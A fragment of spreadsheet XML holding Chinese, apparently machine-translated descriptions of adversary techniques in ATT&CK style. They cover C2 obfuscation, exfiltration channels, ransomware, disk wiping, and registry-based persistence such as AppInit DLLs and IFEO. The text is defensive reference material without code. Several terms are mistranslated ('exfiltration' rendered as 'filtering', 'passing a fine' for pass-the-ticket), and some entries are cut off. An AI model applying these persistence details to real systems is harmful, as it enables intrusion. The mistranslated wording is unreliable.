    <t>攻击者可以从第三方密码管理器获取用户凭据。密码管理器是用于存储用户凭据的应用程序，通常存储在加密的数据库中。在用户提供主密码解锁数据库后，通常可以访问凭据。解锁数据库后，这些凭据可能会复制到内存中。这些数据库可以作为文件存储在磁盘上。</t>
  </si>
  <si>
    <t>攻击者可能会破坏特定系统或网络上的大量数据和文件，以中断系统、服务和网络资源的可用性。通过覆盖本地和远程驱动器上的文件或数据，数据销毁可能会使法医技术无法恢复存储的数据。常见的操作系统文件删除命令（如del和rm）通常只删除指向文件的指针，而不删除文件本身的内容，从而使文件可以通过适当的取证方法恢复。这种行为不同于磁盘内容擦除和磁盘结构擦除，因为单个文件被销毁，而不是存储磁盘或磁盘逻辑结构的部分。</t>
  </si>
  <si>
    <t>攻击者可能会对数据进行编码，使指挥和控制通信的内容更难检测。指挥与控制（C2）信息可以使用标准数据编码系统进行编码。数据编码的使用可能遵循现有的协议规范，包括使用ASCII、Unicode、Base64、MIME或其他二进制到文本和字符编码系统。一些数据编码系统也可能导致数据压缩，比如gzip。</t>
  </si>
  <si>
    <t>攻击者可以使用标准数据编码系统对数据进行编码，以使指挥和控制通信的内容更难检测。指挥与控制（C2）信息可以使用符合现有协议规范的标准数据编码系统进行编码。常见的数据编码方案包括ASCII、Unicode、十六进制、Base64和MIME。一些数据编码系统也可能导致数据压缩，比如gzip。</t>
  </si>
  <si>
    <t>攻击者可能会使用非标准数据编码系统对数据进行编码，以使指挥和控制通信的内容更难检测。指挥与控制（C2）信息可以使用与现有协议规范不同的非标准数据编码系统进行编码。非标准数据编码方案可以基于标准数据编码方案，或者与标准数据编码方案相关，例如HTTP请求的消息体的修改Base64编码。</t>
  </si>
  <si>
    <t>攻击者可以加密目标系统或网络中大量系统上的数据，以中断系统和网络资源的可用性。他们可以通过加密本地和远程驱动器上的文件或数据，并拒绝访问解密密钥，试图使存储的数据不可访问。这可能是为了从受害者那里获得金钱补偿，以换取解密或解密密钥（勒索软件），或者在密钥未保存或传输的情况下使数据永久无法访问。在勒索软件的情况下，常见的用户文件（如Office文档、PDF、图像、视频、音频、文本和源代码文件）通常会被加密。在某些情况下，攻击者可能会加密关键系统文件、磁盘分区和MBR。</t>
  </si>
  <si>
    <t>攻击者可能会从不安全的云存储中访问数据对象。</t>
  </si>
  <si>
    <t>攻击者可以从配置存储库中收集与受管设备相关的数据。管理系统使用配置存储库来配置、管理和控制远程系统上的数据。配置存储库还可以促进设备的远程访问和管理。</t>
  </si>
  <si>
    <t>攻击者可能会以管理信息库（MIB）为目标，在使用简单网络管理协议（SNMP）管理的网络中收集和/或挖掘有价值的信息。</t>
  </si>
  <si>
    <t>攻击者可以访问网络配置文件以收集有关设备和网络的敏感数据。网络配置是一个包含确定设备运行参数的文件。设备通常在运行时存储配置的内存副本，并在非易失性存储器上存储单独的配置，以便在设备重置后加载。攻击者可以检查配置文件，以显示有关目标网络及其布局、网络设备及其软件的信息，或者识别合法帐户和凭据，以供以后使用。</t>
  </si>
  <si>
    <t>攻击者可能会利用信息库挖掘有价值的信息。信息存储库是一种允许存储信息的工具，通常用于促进用户之间的协作或信息共享，并且可以存储各种各样的数据，这些数据可以帮助攻击者实现进一步的目标，或者直接访问目标信息。与外部攻击者共享敏感文档也可能会被滥用。</t>
  </si>
  <si>
    <t>攻击者可能会利用合流存储库挖掘有价值的信息。Confluence通常与Atlassian JIRA一起出现在开发环境中，通常用于存储与开发相关的文档，但通常可能包含更多种类的有用信息，例如：</t>
  </si>
  <si>
    <t>攻击者可以利用SharePoint存储库作为挖掘有价值信息的来源。SharePoint通常会包含有用的信息，以便攻击者了解内部网络和系统的结构和功能。例如，以下是可能对攻击者有潜在价值的示例信息列表，也可以在SharePoint上找到：</t>
  </si>
  <si>
    <t>攻击者可能会利用代码库来收集有价值的信息。代码存储库是存储源代码和自动化软件构建的工具/服务。它们可以在第三方网站（如Github、GitLab、SourceForge和BitBucket）内部或私下托管。用户通常通过web应用程序或git等命令行实用程序与代码存储库进行交互。</t>
  </si>
  <si>
    <t>攻击者可能会搜索本地系统源，如文件系统或本地数据库，以在过滤前找到感兴趣的文件和敏感数据。</t>
  </si>
  <si>
    <t>攻击者可能会在其已泄露的计算机上搜索网络共享，以查找感兴趣的文件。敏感数据可以通过共享网络驱动器（主机共享目录、网络文件服务器等）从远程系统收集，这些驱动器在Exfilter之前可以从当前系统访问。可以使用交互式命令shell，cmd中的常见功能可以用来收集信息。</t>
  </si>
  <si>
    <t>攻击者可能会在其已泄露的计算机上搜索连接的可移动媒体，以查找感兴趣的文件。在过滤前，可以从连接到受损系统的任何可移动介质（光盘驱动器、USB存储器等）收集敏感数据。可以使用交互式命令shell，cmd中的常见功能可以用来收集信息。</t>
  </si>
  <si>
    <t>攻击者可以插入、删除或操纵数据，以操纵外部结果或隐藏活动。通过操纵数据，攻击者可能试图影响业务流程、组织理解或决策。</t>
  </si>
  <si>
    <t>攻击者可以在静止状态下插入、删除或操纵数据，以操纵外部结果或隐藏活动。通过操纵存储的数据，攻击者可能试图影响业务流程、组织理解和决策。</t>
  </si>
  <si>
    <t>攻击者可能会在传输到存储或其他系统的过程中更改数据，以操纵外部结果或隐藏活动。通过操纵传输的数据，攻击者可能试图影响业务流程、组织理解和决策。</t>
  </si>
  <si>
    <t>攻击者可能会修改系统，以便在向最终用户访问和显示数据时对其进行操作。通过操纵运行时数据，攻击者可能试图影响业务流程、组织理解和决策。</t>
  </si>
  <si>
    <t>攻击者可能会混淆指挥和控制通信，使其更难检测。命令和控制（C2）通信是隐藏的（但不一定加密），目的是使内容更难发现或破译，使通信不那么显眼，并隐藏命令以防被看到。这包括许多方法，例如向协议流量添加垃圾数据、使用隐写术或模拟合法协议。</t>
  </si>
  <si>
    <t>攻击者可能会将垃圾数据添加到用于指挥和控制的协议中，从而使检测更加困难。通过向用于指挥和控制的协议中添加随机或无意义的数据，攻击者可以阻止解码、解密或以其他方式分析流量的琐碎方法。示例可能包括使用垃圾字符追加/前置数据，或在有效字符之间写入垃圾字符。</t>
  </si>
  <si>
    <t>攻击者可能会使用隐写技术来隐藏命令和控制流量，从而使检测工作更加困难。隐写术技术可用于在系统之间传输的数字消息中隐藏数据。这些隐藏信息可用于指挥和控制受损系统。在某些情况下，使用隐写术嵌入的文件（如图像或文档文件）的传递可用于命令和控制。</t>
  </si>
  <si>
    <t>攻击者可能会模拟合法协议或web服务流量，以掩盖指挥和控制活动，并阻止分析工作。通过模拟合法协议或web服务，攻击者可以使其命令和控制流量与合法网络流量混合。</t>
  </si>
  <si>
    <t>攻击者可能会在过滤前将收集到的数据存放在中心位置或目录中。数据可以保存在单独的文件中，也可以通过归档收集的数据等技术合并成一个文件。可以使用交互式命令shell，并且可以使用cmd和bash中的公共功能将数据复制到暂存位置。</t>
  </si>
  <si>
    <t>在过滤之前，攻击者可能会将收集到的数据存放在本地系统的中心位置或目录中。数据可以保存在单独的文件中，也可以通过归档收集的数据等技术合并成一个文件。可以使用交互式命令shell，并且可以使用cmd和bash中的公共功能将数据复制到暂存位置。</t>
  </si>
  <si>
    <t>在过滤之前，攻击者可能会将从多个系统收集的数据放在一个系统的中心位置或目录中。数据可以保存在单独的文件中，也可以通过归档收集的数据等技术合并成一个文件。可以使用交互式命令shell，并且可以使用cmd和bash中的公共功能将数据复制到暂存位置。</t>
  </si>
  <si>
    <t>攻击者可能会以固定大小的块而不是整个文件来过滤数据，或者将数据包大小限制在某些阈值以下。此方法可用于避免触发网络数据传输阈值警报。</t>
  </si>
  <si>
    <t>攻击者可能会修改企业网络内部或外部可用的可视内容。诽谤的原因包括传递信息、恐吓或声称（可能是虚假的）入侵信用。干扰性或冒犯性图像可能被用作诽谤的一部分，以引起用户不适，或迫使用户遵守附带的信息。</t>
  </si>
  <si>
    <t>攻击者可能会破坏组织内部的系统，试图恐吓或误导用户。这可能会采取修改内部网站的形式，或者直接修改用户系统，替换桌面墙纸。干扰性或冒犯性图像可能被用作内部诽谤的一部分，以引起用户不适，或迫使用户遵守附带的信息。由于内部破坏系统暴露了攻击者的存在，因此通常在其他入侵目标完成后发生。</t>
  </si>
  <si>
    <t>攻击者可能会破坏组织外部的系统，试图传递消息、恐吓或误导组织或用户。面向外部的网站是诽谤的常见受害者；通常是敌对和黑客行动主义团体的目标，目的是推动政治信息或传播宣传。外部诽谤可能被用作触发事件的催化剂，或作为对组织或政府采取的行动的回应。类似地，网站污损也可能被用作未来攻击的设置或前驱，如按需驾驶。</t>
  </si>
  <si>
    <t>攻击者可能会使用模糊的文件或信息来隐藏入侵工件，使其无法进行分析。他们可能需要单独的机制来解码或去除这些信息，具体取决于他们打算如何使用这些信息。这样做的方法包括恶意软件的内置功能或使用系统上的实用程序。</t>
  </si>
  <si>
    <t>攻击者可能会将容器部署到环境中，以便于执行或躲避防御。在某些情况下，攻击者可能会部署一个新容器来执行与特定映像或部署相关的进程，例如执行或下载恶意软件的进程。在其他情况下，攻击者可能会部署一个新的容器，在没有网络规则、用户限制等的情况下进行配置，以绕过环境中现有的防御。</t>
  </si>
  <si>
    <t>攻击者可能会开发恶意软件和恶意软件组件，以便在瞄准过程中使用。构建恶意软件可能包括开发有效载荷、滴管、泄露后工具、后门（包括后门图像）、打包机、C2协议，以及创建受感染的可移动媒体。攻击者可能会开发恶意软件来支持其操作，创造一种手段来维持对远程机器的控制，逃避防御，并执行事后妥协行为。</t>
  </si>
  <si>
    <t>攻击者可能会创建自签名代码签名证书，以便在目标锁定期间使用。代码签名是对可执行文件和脚本进行数字签名的过程，以确认软件作者并保证代码未被修改或损坏。代码签名为开发人员提供程序的真实性级别，并保证程序未被篡改。用户和/或安全工具可能更信任已签名的代码而不是未签名的代码，即使他们不知道是谁颁发了证书或作者是谁。</t>
  </si>
  <si>
    <t>攻击者可能会创建自签名SSL/TLS证书，以便在目标锁定期间使用。SSL/TLS证书旨在灌输信任。它们包括有关密钥的信息、有关其所有者身份的信息，以及已验证证书内容正确的实体的数字签名。如果签名有效，并且检查证书的人信任签名者，那么他们知道可以使用该密钥与证书所有者通信。在自签名的情况下，数字证书将缺少与第三方证书颁发机构（CA）的签名相关联的信任元素。</t>
  </si>
  <si>
    <t>攻击者可能会开发出可以在瞄准过程中使用的漏洞。漏洞利用漏洞或漏洞，导致计算机硬件或软件出现意外行为。攻击者可以开发自己的漏洞，而不是从网上发现/修改漏洞或从漏洞供应商处购买。攻击者可能会使用通过漏洞获取的信息来集中利用开发工作。作为漏洞开发过程的一部分，攻击者可以通过模糊化和补丁分析等方法发现可利用的漏洞。</t>
  </si>
  <si>
    <t>攻击者可以直接访问卷以绕过文件访问控制和文件系统监视。Windows允许程序直接访问逻辑卷。具有直接访问权限的程序可以通过分析文件系统数据结构直接从驱动器读取和写入文件。这种技术绕过了Windows文件访问控制和文件系统监控工具。</t>
  </si>
  <si>
    <t>攻击者可能会擦除或损坏特定系统上或网络中大量的原始磁盘数据，从而中断系统和网络资源的可用性。通过对磁盘的直接写访问，攻击者可能会试图覆盖部分磁盘数据。攻击者可能会选择擦除磁盘数据的任意部分和/或擦除主引导记录（MBR）等磁盘结构。可能会尝试完全擦除所有磁盘扇区。</t>
  </si>
  <si>
    <t>攻击者可能会删除特定系统或网络中大量存储设备的内容，以中断系统和网络资源的可用性。</t>
  </si>
  <si>
    <t>攻击者可能会破坏或擦除硬盘上启动系统所需的磁盘数据结构；针对特定的关键系统或网络中的大量系统，以中断系统和网络资源的可用性。</t>
  </si>
  <si>
    <t>攻击者可能会修改域的配置设置，以逃避防御和/或升级域环境中的权限。域提供了一种集中管理计算机资源（例如：计算机、用户帐户）在网络上的行为和交互方式的方法。域的策略还包括可在多域/林环境中的域之间应用的配置设置。对域设置的修改可能包括更改域组策略对象（GPO）或更改域的信任设置，包括联合信任。</t>
  </si>
  <si>
    <t>攻击者可能会修改组策略对象（GPO）以破坏域的预期自主访问控制，通常是为了提升域上的权限。组策略允许集中管理Active Directory（AD）中的用户和计算机设置。GPO是由存储在可预测网络路径\&lt;DOMAIN&gt;\SYSVOL\&lt;DOMAIN&gt;\Policies\中的文件组成的组策略设置容器。</t>
  </si>
  <si>
    <t>攻击者可能会添加新的域信任或修改现有域信任的属性，以逃避防御和/或提升权限。域信任详细信息（例如域是否联合）允许在域之间应用身份验证和授权属性，以访问共享资源。这些信任对象可能包括应用于服务器、令牌和域的帐户、凭据和其他身份验证材料。</t>
  </si>
  <si>
    <t>攻击者可能试图收集有关域信任关系的信息，这些信息可用于识别Windows多域/林环境中的横向移动机会。域信任为域提供了一种机制，允许基于另一个域的身份验证过程访问资源。域信任允许受信任域的用户访问信任域中的资源。发现的信息可能有助于攻击者进行SID历史记录注入、通过罚单和Kerberoasting。可以使用DSEnumerateDomainTrusts（）Win32 API调用枚举域信任。NET方法和LDAP。已知Windows实用程序Nltest被攻击者用来枚举域信任。</t>
  </si>
  <si>
    <t>攻击者可以通过用户在正常浏览过程中访问网站来访问系统。使用这种技术，用户的web浏览器通常会成为攻击目标，但攻击者也可能会使用受损网站进行非攻击行为，例如获取应用程序访问令牌。</t>
  </si>
  <si>
    <t>攻击者可能会使用Fast Flux DNS将命令和控制通道隐藏在与单个域解析链接的快速变化的IP地址数组后面。这种技术使用一个完全限定的域名，为其分配多个IP地址，并对DNS资源记录使用循环IP寻址和短时生存（TTL）相结合的方式进行高频交换。</t>
  </si>
  <si>
    <t>攻击者可以利用域生成算法（DGA）来动态识别指挥和控制通信的目标域，而不是依赖静态IP地址或域列表。这样做的好处是，防御者更难拦截、跟踪或接管指挥和控制通道，因为恶意软件可能会检查数千个域以获取指令。</t>
  </si>
  <si>
    <t>攻击者可以对DNS结果中返回的地址进行计算，以确定用于命令和控制的端口和IP地址，而不是依赖于预定的端口号或实际返回的IP地址。IP和/或端口号计算可用于绕过C2信道上的出口过滤。</t>
  </si>
  <si>
    <t>攻击者可能会以用户电子邮件为目标来收集敏感信息。电子邮件可能包含对攻击者有价值的敏感数据，包括商业秘密或个人信息。攻击者可以从邮件服务器或客户端收集或转发电子邮件。</t>
  </si>
  <si>
    <t>攻击者可能会通过本地系统上的用户电子邮件来收集敏感信息。可以从用户的本地系统获取包含电子邮件数据的文件，例如Outlook存储或缓存文件。</t>
  </si>
  <si>
    <t>攻击者可能会以Exchange server、Office 365或Google Workspace为目标来收集敏感信息。攻击者可以利用用户的凭据，直接与Exchange服务器交互，以从网络中获取信息。攻击者还可以访问面向外部的Exchange服务、Office 365或Google Workspace，以使用凭据或访问令牌访问电子邮件。MailSniper等工具可用于自动搜索特定关键字。</t>
  </si>
  <si>
    <t>攻击者可以设置电子邮件转发规则来收集敏感信息。攻击者可能会滥用电子邮件转发规则来监控受害者的活动、窃取信息，并进一步获取有关受害者或受害者组织的情报，以作为进一步利用或行动的一部分。此外，电子邮件转发规则可以允许攻击者保持对受害者电子邮件的持久访问，即使管理员重置了泄露的凭据。大多数电子邮件客户端允许用户为各种电子邮件功能创建收件箱规则，包括转发给其他收件人。这些规则可以通过本地电子邮件应用程序、web界面或命令行界面创建。邮件可以转发给内部或外部收件人，并且没有限制此规则范围的限制。管理员还可以为具有相同注意事项和结果的用户帐户创建转发规则。</t>
  </si>
  <si>
    <t>攻击者可以使用已知的加密算法来隐藏命令和控制流量，而不是依赖通信协议提供的任何固有保护。尽管使用了安全算法，但如果在恶意软件样本/配置文件中编码和/或生成密钥，这些实现可能容易受到逆向工程的攻击。</t>
  </si>
  <si>
    <t>攻击者可以使用已知的对称加密算法来隐藏命令和控制流量，而不是依赖通信协议提供的任何固有保护。对称加密算法使用相同的密钥进行明文加密和密文解密。常见的对称加密算法包括AES、DES、3DES、Blowfish和RC4。</t>
  </si>
  <si>
    <t>攻击者可以使用已知的非对称加密算法来隐藏命令和控制流量，而不是依赖通信协议提供的任何固有保护。非对称加密，也称为公钥加密，每一方使用一个密钥对：一个可以自由分发的公共密钥对和一个私有密钥对。由于密钥是如何生成的，发送方用接收方的公钥加密数据，接收方用私钥解密数据。这样可以确保只有预期的收件人才能读取加密的数据。常见的公钥加密算法包括RSA和ElGamal。</t>
  </si>
  <si>
    <t>攻击者可能会执行端点拒绝服务（DoS）攻击，以降低或阻止向用户提供服务的可用性。端点DoS可以通过耗尽承载这些服务的系统资源或利用系统造成持续崩溃条件来执行。示例服务包括网站、电子邮件服务、DNS和基于web的应用程序。观察到攻击者出于政治目的进行DoS攻击，并支持其他恶意活动，包括分心、黑客行动主义和敲诈勒索。</t>
  </si>
  <si>
    <t>由于操作系统（OS）负责管理系统上的有限资源，因此攻击者可能会针对操作系统（OS）进行DoS攻击。这些攻击不需要耗尽系统上的实际资源，因为它们可以简单地耗尽操作系统自身施加的限制，以防止整个系统因对其容量的过度需求而不堪重负。</t>
  </si>
  <si>
    <t>攻击者可能会针对系统提供的不同网络服务进行拒绝服务攻击。攻击者通常以DNS和web服务为目标，然而其他人也成为了目标。Web服务器软件可以通过多种方式受到攻击，其中一些方式通常适用，而另一些则特定于用于提供服务的软件。</t>
  </si>
  <si>
    <t>攻击者可能会以web应用程序的资源密集型功能为目标，导致拒绝服务（DoS）。web应用程序中的特定功能可能会占用大量资源。对这些功能的重复请求可能会耗尽系统资源，并拒绝对应用程序或服务器本身的访问。</t>
  </si>
  <si>
    <t>攻击者可能会利用软件漏洞，导致应用程序或系统崩溃，并拒绝用户使用。当崩溃发生时，一些系统可能会自动重启关键应用程序和服务，但它们可能会被再次利用，从而导致持续的DoS情况。</t>
  </si>
  <si>
    <t>攻击者可能会冲出容器来访问底层主机。这可以允许攻击者从主机级别或主机本身访问其他容器化资源。原则上，容器化资源应提供应用程序功能的明确分离，并与主机环境隔离。</t>
  </si>
  <si>
    <t>攻击者可能会创建和培育客户，并提供可在目标锁定期间使用的服务。攻击者可以创建帐户，用于构建角色以进一步开展业务。人物角色发展包括公共信息的发展、存在、历史和适当的联系。这一发展可以应用于社交媒体、网站或其他公开信息，这些信息可以在使用该角色或身份的操作过程中被引用和审查其合法性。</t>
  </si>
  <si>
    <t>攻击者可能会创建和培育社交媒体账户，以便在瞄准目标时使用。攻击者可以创建社交媒体帐户，用于构建角色以进一步开展业务。人物角色发展包括公共信息的发展、存在、历史和适当的联系。</t>
  </si>
  <si>
    <t>攻击者可能会创建电子邮件帐户，以便在锁定目标时使用。攻击者可以使用与电子邮件提供商创建的帐户来推进其操作，例如利用他们进行信息钓鱼或网络钓鱼。攻击者还可能采取措施，围绕电子邮件帐户培养一个角色，例如通过使用社交媒体帐户，以增加后续行为的成功几率。创建的电子邮件帐户也可用于购买基础设施（例如：域）。</t>
  </si>
  <si>
    <t>攻击者可以使用基于特定事件触发执行的系统机制建立持久性和/或提升权限。各种操作系统都有监视和订阅事件（如登录）或其他用户活动（如运行特定应用程序/二进制文件）的方法。</t>
  </si>
  <si>
    <t>攻击者可以通过执行由文件类型关联触发的恶意内容来建立持久性。打开文件时，会选中用于打开文件的默认程序（也称为文件关联或处理程序）。文件关联选择存储在Windows注册表中，可以由具有注册表访问权限的用户、管理员或程序编辑，也可以由管理员使用内置的assoc实用程序编辑。应用程序可以修改给定文件扩展名的文件关联，以便在打开具有给定扩展名的文件时调用任意程序。</t>
  </si>
  <si>
    <t>攻击者可以通过执行由用户不活动触发的恶意内容来建立持久性。屏幕保护程序是在可配置的用户不活动时间后执行的程序，由带有。scr文件扩展名。Windows屏幕保护程序应用程序scrnsave。scr位于64位Windows系统上的C:\Windows\System32\和C:\Windows\sysWOW64\中，以及基本Windows安装中包含的屏幕保护程序。</t>
  </si>
  <si>
    <t>攻击者可以通过执行Windows Management Instrumentation（WMI）事件订阅触发的恶意内容来建立持久性并提升权限。WMI可用于安装事件筛选器、提供程序、使用者和绑定，在定义的事件发生时执行代码。可以订阅的事件示例包括挂钟时间、用户登录或计算机正常运行时间。</t>
  </si>
  <si>
    <t>攻击者可以通过执行由用户外壳触发的恶意命令来建立持久性。用户Unix shell根据事件在整个会话的不同时间点执行多个配置脚本。例如，当用户打开命令行界面或远程登录（例如通过SSH）时，将启动登录shell。登录shell执行来自系统（/etc）和用户主目录（~/）的脚本来配置环境。系统上的所有登录shell在启动时都使用/etc/profile。这些配置脚本在其目录的权限级别上运行，通常用于设置环境变量、创建别名和自定义用户环境。当shell退出或终止时，会执行额外的shell脚本，以确保shell正确退出。</t>
  </si>
  <si>
    <t>攻击者可以通过执行由中断信号触发的恶意内容来建立持久性。trap命令允许程序和shell指定在接收到中断信号时执行的命令。一种常见的情况是脚本允许优雅地终止和处理常见的键盘中断，如ctrl+c和ctrl+d。</t>
  </si>
  <si>
    <t>攻击者可以通过执行受污染的二进制文件触发的恶意内容来建立持久性。Mach-O二进制文件有一系列头文件，用于在加载二进制文件时执行某些操作。Mach-O二进制文件中的LC_LOAD_DYLIB头告诉macOS和OS X在执行期间加载哪些动态库（DYLIB）。只要对其余字段和依赖项进行了调整，就可以将它们临时添加到已编译的二进制文件中。有可用的工具来执行这些更改。</t>
  </si>
  <si>
    <t>攻击者可以通过执行Netsh Helper DLL触发的恶意内容来建立持久性。Netsh。exe（也称为Netshell）是一个命令行脚本实用程序，用于与系统的网络配置进行交互。它包含添加辅助DLL以扩展实用程序功能的功能。指向已注册netsh的路径。exe helper DLL被输入Windows注册表HKLM\SOFTWARE\Microsoft\Netsh。</t>
  </si>
  <si>
    <t>攻击者可以通过执行可访问性功能触发的恶意内容来建立持久性和/或提升权限。Windows包含可访问性功能，可在用户登录之前（例如：当用户在Windows登录屏幕上时）使用组合键启动。攻击者可以修改这些程序的启动方式，以便在不登录系统的情况下获得命令提示符或后门。</t>
  </si>
  <si>
    <t>攻击者可以通过执行由加载到进程中的AppCert DLL触发的恶意内容来建立持久性和/或提升权限。在HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\下的AppCertDLS注册表项中指定的动态链接库（DLL）加载到每个调用广泛使用的应用程序编程接口（API）函数CreateProcess、CreateProcessAsUser、CreateProcessWithLoginW、CreateProcessWithTokenW或WinExec的进程中。</t>
  </si>
  <si>
    <t>攻击者可以通过执行由加载到进程中的AppInit DLL触发的恶意内容来建立持久性和/或提升权限。在注册表项HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows或HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows的AppInit_DLL值中指定的动态链接库（DLL）由user32加载。dll加载到每个加载user32的进程中。dll。实际上，这几乎适用于所有程序，因为user32。dll是一个非常常见的库。</t>
  </si>
  <si>
    <t>攻击者可以通过执行应用程序触发的恶意内容来建立持久性和/或提升权限。创建Microsoft Windows应用程序兼容性基础架构/框架（应用程序垫片）是为了在操作系统代码库随时间变化时允许软件向后兼容。例如，应用程序填充功能允许开发人员对为Windows XP创建的应用程序进行修复（无需重写代码），从而使其能够与Windows 10一起使用。</t>
  </si>
  <si>
    <t>攻击者可以通过执行图像文件执行选项（IFEO）调试器触发的恶意内容来建立持久性和/或提升权限。IFEO使开发人员能够将调试器附加到应用程序。创建进程时，应用程序的IFEO中的调试器将被添加到应用程序的名称前，从而有效地在调试器下启动新进程（例如，C:\dbg\ntsd.exe-g notepad.exe）。</t>
  </si>
  <si>
    <t>攻击者可以通过执行由PowerShell配置文件触发的恶意内容来获得持久性并提升权限。PowerShell配置文件（profile.ps1）是在PowerShell启动时运行的脚本，可以用作自定义用户环境的登录脚本。</t>
  </si>
  <si>
    <t>攻击者可以通过执行事件监视程序（emond）触发的恶意内容来获得持久性并提升权限。Emond是一个启动守护进程，它接受来自各种服务的事件，通过简单的规则引擎运行它们，并采取行动。位于/sbin/emond的emond二进制文件将从/etc/emond加载任何规则。d/rules/directory，并在显式定义的事件发生后采取操作。</t>
  </si>
  <si>
    <t>攻击者可能会通过执行被劫持的组件对象模型（COM）对象引用触发的恶意内容来建立持久性。COM是Windows中的一个系统，用于通过操作系统实现软件组件之间的交互。对各种COM对象的引用存储在注册表中。</t>
  </si>
  <si>
    <t>攻击者可能会利用恶意软件的关键有效载荷或其他功能来逃避防御，并将执行限制在特定的目标环境中。环境密钥使用密码学来约束执行或行动，这些执行或行动基于攻击者提供的特定于环境的条件，这些条件预计会出现在目标上。环境密钥是执行护栏的一种实现，它利用密码技术从给定计算环境中特定类型的值中导出加密/解密密钥。</t>
  </si>
  <si>
    <t>攻击者可以通过与现有命令和控制通道不同的协议过滤数据，从而窃取数据。数据也可以从主命令和控制服务器发送到备用网络位置。</t>
  </si>
  <si>
    <t>攻击者可以通过现有的命令和控制通道过滤数据来窃取数据。被盗数据使用与指挥和控制通信相同的协议编码到正常通信信道中。</t>
  </si>
  <si>
    <t>攻击者可能会试图通过与指挥和控制通道不同的网络介质过滤数据。如果命令和控制网络是有线互联网连接，则可能会发生过滤，例如，通过WiFi连接、调制解调器、蜂窝数据连接、蓝牙或其他射频（RF）通道。</t>
  </si>
  <si>
    <t>攻击者可能会试图通过蓝牙而非命令和控制通道过滤数据。如果指挥和控制网络是有线互联网连接，攻击者可能会选择使用蓝牙通信通道过滤数据。</t>
  </si>
  <si>
    <t>攻击者可能试图通过物理介质（如可移动驱动器）过滤数据。在某些情况下，例如气隙网络泄漏，可能会通过用户引入的物理介质或设备发生渗出。这种媒体可以是外部硬盘驱动器、USB驱动器、手机、MP3播放器或其他可移动存储和处理设备。物理介质或设备可以用作最终过滤点，或在其他断开的系统之间切换。</t>
  </si>
  <si>
    <t>攻击者可能试图通过USB连接的物理设备过滤数据。在某些情况下，例如空气间隙网络泄漏，可能会通过用户引入的USB设备进行过滤。USB设备可以用作最终的过滤点，也可以在其他断开连接的系统之间切换。</t>
  </si>
  <si>
    <t>攻击者可以使用现有的合法外部Web服务来过滤数据，而不是使用其主要的命令和控制通道。作为过滤机制的流行Web服务可能会提供大量的保护，因为网络中的主机可能已经在泄露之前与它们通信。防火墙规则也可能已经存在，以允许这些服务的流量。</t>
  </si>
  <si>
    <t>攻击者可能会将数据导出到代码存储库，而不是通过其主要的命令和控制通道。代码库通常可以通过API访问（例如：https://api.github.com)。通常通过HTTPS访问这些API，这为攻击者提供了额外的保护级别。</t>
  </si>
  <si>
    <t>攻击者可能会将数据导出到云存储服务，而不是通过其主命令和控制通道。云存储服务允许通过互联网从远程云存储服务器存储、编辑和检索数据。</t>
  </si>
  <si>
    <t>攻击者可能试图利用面向互联网的计算机或程序中的弱点，使用软件、数据或命令，以导致意外或意外行为。系统中的弱点可能是错误、小故障或设计漏洞。这些应用程序通常是网站，但可以包括数据库（如SQL）、标准服务（如SMB或SSH）、网络设备管理和管理协议（如SNMP和Smart Install），以及具有可访问Internet的开放套接字的任何其他应用程序，如web服务器和相关服务。根据所利用的漏洞，这可能包括用于防御规避的漏洞。</t>
  </si>
  <si>
    <t>攻击者可能会利用客户端应用程序中的软件漏洞来执行代码。由于可能导致意外行为的不安全编码实践，软件中可能存在漏洞。攻击者可以通过有针对性的攻击利用某些漏洞来执行任意代码。通常，攻击性工具包最有价值的利用是那些可用于在远程系统上获得代码执行的利用，因为它们可用于访问该系统。用户希望看到与他们通常用于工作的应用程序相关的文件，因此，由于它们的高实用性，它们是开发研究和开发的有用目标。</t>
  </si>
  <si>
    <t>攻击者可能会利用软件漏洞试图收集凭据。当攻击者利用程序、服务或操作系统软件或内核本身中的编程错误来执行攻击者控制的代码时，就会发生软件漏洞攻击。认证和身份验证机制可能会成为攻击者利用的目标，作为获取有用凭据的手段，或绕过获取系统访问权限的过程。其中一个例子是MS14-068，它以Kerberos为目标，可用于使用域用户权限伪造Kerberos票证。攻击凭据访问还可能导致权限升级，具体取决于目标进程或获得的凭据。</t>
  </si>
  <si>
    <t>攻击者可以利用系统或应用程序漏洞绕过安全功能。当攻击者利用程序、服务或操作系统软件或内核本身中的编程错误来执行攻击者控制的代码时，就会发生软件漏洞攻击。防御安全软件中可能存在漏洞，可用于禁用或规避这些漏洞。</t>
  </si>
  <si>
    <t>攻击者可能会利用软件漏洞来提升权限。当攻击者利用程序、服务或操作系统软件或内核本身中的编程错误来执行攻击者控制的代码时，就会发生软件漏洞攻击。权限级别等安全结构通常会阻碍对信息的访问和某些技术的使用，因此攻击者可能需要执行权限提升，以包括使用软件攻击来规避这些限制。</t>
  </si>
  <si>
    <t>一旦进入网络，攻击者可能会利用远程服务获得对内部系统的未经授权访问。当攻击者利用程序、服务或操作系统软件或内核本身中的编程错误来执行攻击者控制的代码时，就会发生软件漏洞攻击。远程服务泄露后利用的一个共同目标是横向移动，以便能够访问远程系统。</t>
  </si>
  <si>
    <t>攻击者可能会利用面向外部的远程服务在网络中进行初始访问和/或持久化。VPN、Citrix和其他访问机制等远程服务允许用户从外部位置连接到内部企业网络资源。通常有远程服务网关来管理这些服务的连接和凭据身份验证。Windows远程管理和VNC等服务也可以在外部使用。</t>
  </si>
  <si>
    <t>攻击者可能会列举文件和目录，或者在主机或网络共享的特定位置搜索文件系统中的某些信息。在自动发现过程中，攻击者可能会使用文件和目录发现中的信息来塑造后续行为，包括攻击者是否完全感染目标和/或尝试特定行动。</t>
  </si>
  <si>
    <t>攻击者可能会修改文件或目录权限/属性，以避开访问控制列表（ACL）并访问受保护的文件。文件和目录权限通常由文件或目录所有者或具有相应权限的用户配置的ACL管理。文件和目录ACL的实现因平台而异，但通常明确指定哪些用户或组可以执行哪些操作（读、写、执行等）。</t>
  </si>
  <si>
    <t>攻击者可能会修改文件或目录权限/属性，以避开访问控制列表（ACL）并访问受保护的文件。文件和数据</t>
  </si>
  <si>
    <t>攻击者可能会覆盖或损坏系统BIOS的闪存内容或连接到系统的设备中的其他固件，以使其无法操作或无法启动。固件是从硬件设备上的非易失性内存加载和执行的软件，用于初始化和管理设备功能。这些设备可能包括主板、硬盘或视频卡。</t>
  </si>
  <si>
